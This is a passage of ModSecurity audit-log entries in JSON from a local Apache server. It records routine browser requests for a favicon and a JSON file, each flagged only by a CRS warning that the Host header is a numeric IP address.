\"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcHrX8AAQEAAAmHBIoAAAAF\"]"],"stopwatch":{"p1":417,"p2":1153,"p3":51,"p4":291,"p5":53,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIsAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcHrX8AAQEAAAmHBIsAAAAF\"]"],"stopwatch":{"p1":410,"p2":939,"p3":47,"p4":394,"p5":49,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:03 --0400","transaction_id":"WRcIt38AAQEAAAkW4RIAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcIt38AAQEAAAkW4RIAAAAB\"]"],"stopwatch":{"p1":462,"p2":963,"p3":44,"p4":260,"p5":59,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:03 --0400","transaction_id":"WRcIt38AAQEAAAkW4RMAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcIt38AAQEAAAkW4RMAAAAB\"]"],"stopwatch":{"p1":502,"p2":891,"p3":47,"p4":252,"p5":53,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:04 --0400","transaction_id":"WRcIuH8AAQEAAAkW4RQAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:22:58 GMT","ETag":"\"21-54f67b8770b5d\"","Accept-Ranges":"bytes","Content-Length":"33","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcIuH8AAQEAAAkW4RQAAAAB\"]"],"stopwatch":{"p1":392,"p2":1541,"p3":90,"p4":207,"p5":90,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs98AAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:34:58 GMT","ETag":"\"65-54f67e363bf86\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcLhn8AAQEAAAkXs98AAAAC\"]"],"stopwatch":{"p1":732,"p2":1341,"p3":166,"p4":160,"p5":63,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs@AAAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLhn8AAQEAAAkXs@AAAAAC\"]"],"stopwatch":{"p1":391,"p2":881,"p3":47,"p4":373,"p5":54,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs@EAAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLhn8AAQEAAAkXs@EAAAAC\"]"],"stopwatch":{"p1":485,"p2":941,"p3":44,"p4":241,"p5":51,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:51 --0400","transaction_id":"WRcLt38AAQEAAAkYuEMAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:34:58 GMT","If-None-Match":"\"65-54f67e363bf86\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:35:49 GMT","ETag":"\"65-54f67e66856bf\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcLt38AAQEAAAkYuEMAAAAD\"]"],"stopwatch":{"p1":455,"p2":1109,"p3":131,"p4":232,"p5":55,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:52 --0400","transaction_id":"WRcLuH8AAQEAAAkYuEQAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLuH8AAQEAAAkYuEQAAAAD\"]"],"stopwatch":{"p1":378,"p2":800,"p3":147,"p4":250,"p5":50,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:52 --0400","transaction_id":"WRcLuH8AAQEAAAkYuEUAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 